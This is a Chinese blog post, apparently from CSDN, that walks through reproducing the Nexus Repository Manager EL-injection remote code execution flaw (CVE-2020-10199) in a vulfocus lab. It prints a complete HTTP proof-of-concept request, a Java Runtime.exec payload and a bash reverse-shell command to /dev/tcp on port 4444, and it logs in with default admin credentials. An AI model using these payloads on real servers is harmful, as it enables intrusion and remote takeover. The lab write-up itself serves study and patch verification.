nexus 远程代码执行 (CVE-2020-10199)

已于 2022-12-20 19:56:27 修改
阅读量985 收藏 1
点赞数 1
分类专栏: CVE 文章标签: 安全 web安全
于 2022-12-20 19:56:06 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_60716947/article/details/128389164
版权

目录

一、漏洞信息

二、影响版本

三、环境搭建

四、漏洞复现 

五、修复建议 

这里用的是docker desktop+vulfocus搭建的环境。

一、漏洞信息

名称: nexus 远程代码执行 (CVE-2020-10199/10204)

描述: Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。 CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全的执行EL表达式导致的。

二、影响版本

Nexus Repository Manager OSS/Pro 3.x <= 3.21.1

三、环境搭建

运行docker desktop,运行vulfocus容器

打开vulfoucs,搜索CVE-2020-10199或nexus 远程代码执行

下载靶场,下面那个是CVE-2020-10204,这里就不下载了。

 下载完成后启动靶场。

四、漏洞复现 

访问地址,刚开始会初始化一会,等一下就好了

右上角登陆,弱口令admin/admin登录

 登录时抓包,一个个放包,

比如这个包,获取里面的NX-ANTI-CSRF-TOKEN和Cookie里面的NXSESSIONID

之后在重放模块里面粘贴POC,这个包执行的是3个233相乘的表达式,通过这个表达式能否执行来判断漏洞存在与否

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 靶场ip:端口
Content-Length: 203
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.7886248393834028
Content-Type: application/json
Accept: */*
Origin: 靶场ip:端口
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: 靶场ip:端口
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.7886248393834028; NXSESSIONID=cedf848f-d881-4b58-ac24-9e9c3ece40bc
Connection: close    

{
  "name": "internal",
  "online": true,
  "storage":
 {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group":
 {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

 根据自己的情况修改一下。新建一个空的页面

将上面的poc粘贴进去, 我修改后是这样

POST /service/rest/beta/repositories/go/group HTTP/1.1
Host: 192.168.0.6:10787
Content-Length: 209
X-Requested-With: XMLHttpRequest
X-Nexus-UI: true
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/80.0.3987.149 Safari/537.36
NX-ANTI-CSRF-TOKEN: 0.46798851483258597
Content-Type: application/json
Accept: */*
Origin: http://192.168.0.6:10787
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Referer: http://192.168.0.6:10787/
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: NX-ANTI-CSRF-TOKEN=0.46798851483258597; NXSESSIONID=00e0ec13-4678-4247-b392-7310e0c64080
Connection: close    

{
  "name": "internal",
  "online": true,
  "storage":
 {
    "blobStoreName": "default",
    "strictContentTypeValidation": true
  },
  "group":
 {
    "memberNames": ["$\\A{233*233*233}"]
  }
}

发送,注意右上角的目标也要填

 可以看到执行成功了。

修改memberNames的值为

$\\A{''.getClass().forName('java.lang.Runtime').getMethods()[6].invoke(null).exec('touch /tmp/success')}

可以看到执行成功,我们 ls /tmp看flag,发现回显一直是这个,那么就用nc反弹shell,

将exec里面执行的命令改为

/bin/bash -c bash$IFS$9-i>&/dev/tcp/{自己服务器ip}/4444<&1

 这里我们用Ubuntu来nc监听,

 然后发包

五、修复建议 

升级至最新版本的Nexus Repository Manager(3.21.2或更高版本),可从Sonatype网站获得

清丶酒孤欢ゞ
关注
  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
weixin_45260839的博客
05-29 1606
CVE-2020-10199 Nexus Repository Manager3远程命令执行漏洞复现
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199
ch258563的博客
06-06 1388
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199
NEXUS CVE-2020-10199漏洞复现
MDSEC的博客
08-16 142
漏洞名称Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199)漏洞简述​ 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现
ierciyuan的博客
08-01 1041
CVE-2020-10199 Nexus Repository Manager 3 远程命令执行漏洞复现。测试漏洞并反弹shell。
Nexus Repository Manager3( CVE-2020-10199) 远程命令执行漏洞排查
dayouzi的博客
08-14 839
nexus的全称是Nexus Repository Manager,是Sonatype公司的一个产品。它是一个强大的仓库管理器,极大地简化了内部仓库的维护和外部仓库的访问。主要用它来搭建公司内部的maven私服。但是它的功能不仅仅是创建maven私有仓库这么简单,还可以作为nuget、docker、npm、bower、pypi、rubygems、git lfs、yum、go、apt等的私有仓库,功能非常强大。
CVE-2020-21224 ClusterEngineV4.0 远程代码执行.md
04-11
CVE-2020-21224 ClusterEngineV4.0 远程代码执行
CVE-2020-11890:CVE-2020-11890
03-10
Joomla中的远程代码执行(RCE) 使用您的凭据运行cve202011890.py并访问链接rce: 使用docker的指南,例如: #步骤1: docker pull hoangkien1020 / joomla:3.9.16 #第2步: 码头工人运行-d --rm -it -p 8080:80...
cve-2020-14750.zip9(补丁升级)
05-26
2020年11月2日,Oracle官方发布了此安全警报针对Oracle WebLogic Server中的远程代码执行漏洞CVE-2020-14750,此漏洞可以在没有身份验证的情况下进行远程攻击,也就是说,可以在不需要用户名和密码的情况下通过网络...
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2020-10199: Nexus Repository Manager代码执行通告
爱国小白帽
04-02 1390
CVE-2020-10199: Nexus Repository Manager代码执行通告 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x 的远程代码执行漏洞通告。在...
[CVE-2020-10199/10204] Nexus Repository Manager 3 RCE
公众号shadow sock7
04-02 5828
参考 https://support.sonatype.com/hc/en-us/articles/360044882533 https://mp.weixin.qq.com/s/xUWPVwcNL6n6snn_gV_UwA 漏洞描述 XSS就算了。 RCE: an attacker with any type of account on NXRM to execute arbitrary ...
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析
爱国小白帽
04-07 1660
CVE-2020-10204/CVE-2020-10199: Nexus Repository Manager3 分析 360-CERT [360CERT](javascript:void(0)???? 今天 0x00 漏洞背景 2020年04月02日, 360CERT监测发现 Sonatype Security Team 官方发布了一则关于 Nexus Repository Manager 3.x ...
CVE-2020-10199 远程命令执行漏洞
m0_46580995的博客
07-23 2646
Nexus Repository Manager 3 远程命令执行漏洞(CVE-2020-10199) 其3.21.1及之前版本中,存在一处任意EL表达式注入漏洞。 复现环境 vulhub 复现漏洞首先要知道用户名和密码,vulhub已经给出 admin/admin 使用msf5搜索exp CVE-2020-10199 use exp查看选项 show options x需要配置Rhost,Lhost ,password和port check一下 目标脆弱可以run ls ...
NEXUS CVE-2020-10204 漏洞复现
MDSEC的博客
08-17 564
Nexus Repository Manager(NXRM)是美国Sonatype公司的一款Maven仓库管理器。CVE-2020-10199的漏洞需要普通用户权限即可触发,而CVE-2020-10204则需要管理员权限。两个漏洞的触发原因均是不安全执行EL表达式导致的。这样漏洞就复现完毕,中途又不懂的代码可看前一文章有详细讲解。2.用弱口令登录,账号:admin,密码:admin。在虚拟机验证是否成功。
java 远程执行linux命令_Nexus 远程命令执行漏洞 CVE202010199
weixin_39875941的博客
12-02 300
“燕云实验室”是河北千诚电子科技有限公司成立的网络安全攻防技术研究实验室。专注于web安全,网络攻防,安全运维,应急溯源方面的研究,开发成果应用于产品核心技术转化,国家重点科技项目攻关。一、关于 NexusNexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。在 ...
Nexus远程命令执行CVE-2020-10199
Adminxe的博客
12-03 1078
0x01 漏洞描述 2020年03月31 日,Sonatype 官方发布安全公告,声明修复了存在于 Nexus Repository Manager 3 中的远程代码执行漏洞 CVE-2020-10199。   Sonatype Nexus 是一个 Maven 的仓库管理系统,它提供了强大的仓库管理、构件搜索等功能,并且可以用来搭建 Maven 仓库私服,在代理远程仓库的同时维护本地仓库,以节省带宽和时间。   在 Nexus Repository Manager OSS/Pro 3.21.1 及..
Linux部署Nexus通过Maven推送及拉取代码
最新发布
夏澜_博客
12-26 96
目录1、2、安装3、设置开机自启4、登录系统5、配置中央仓库6、用户管理7、创建仓库8、代码推送9、引入私有仓库包1、下载搭建版本:3.45.02、安装将下载的nexus-3.45.0-01-unix.tar.gz上传到/home/nexus下解压操作配置nexus​ neuxs的默认占用内存大小为2703m,可以根据实际情况进行适当的修改配置端口。
cve-2020-9484 漏洞复现
08-09
CVE-2020-9484是Apache Tomcat容器中的一种身份验证绕过漏洞。要复现该漏洞,我们需要满足以下条件: 1. 安装Apache Tomcat服务器:首先需要在本地或远程环境中安装Apache Tomcat服务器。确保Tomcat版本为9.0.0.M1至9.0.0.30。 2. 配置Tomcat服务器:在Tomcat的配置文件中(通常是server.xml),需要启用HTTP Connector属性中的restEnabled参数。该参数默认为false,我们需要将其设置为true。 3. 修改用户配置文件:在Tomcat配置文件的users节点中,添加一个或多个用户。为了复现漏洞,我们需要至少添加一个用户名为test的用户及其密码。 4. 启动Tomcat服务器:启动Tomcat服务器,确保它在本地或远程环境中运行。 5. 发起请求攻击:使用任何Web请求工具(如curl、Postman等),构造以下HTTP请求: POST /servlets-examples/servlet/RequestParamExample HTTP/1.1 Host: [Tomcat服务器IP地址]:[Tomcat服务器端口号] Content-Length: [content-length] Transfer-Encoding: [transfer-encoding] attName=%25%7B%25+%27test%27%2e%25+%27class%27%7d 其中,[Tomcat服务器IP地址]替换为Tomcat服务器的实际IP地址,[Tomcat服务器端口号]替换为Tomcat服务器的实际端口号,[content-length]和[transfer-encoding]分别为请求体的长度和编码方式。 6. 漏洞验证:如果成功复现漏洞,我们将获得类似以下的服务器响应: HTTP/1.1 200 OK [其他响应头信息] Content-Type: text/html;charset=UTF-8 [其他响应体信息] ${%27test%27.class} 如果响应体中包含"${'test'.class}"的引用,则漏洞已成功复现。这说明攻击者绕过了身份验证,并成功执行了恶意代码。 需要注意的是,CVE-2020-9484漏洞可能会导致未经授权的远程代码执行,攻击者可以利用此漏洞来执行任意代码,可能导致服务器受到严重影响。在验证漏洞后,建议尽快升级Tomcat服务器,安装相应的补丁或增加其他安全措施,以避免潜在的安全威胁。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清丶酒孤欢ゞ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值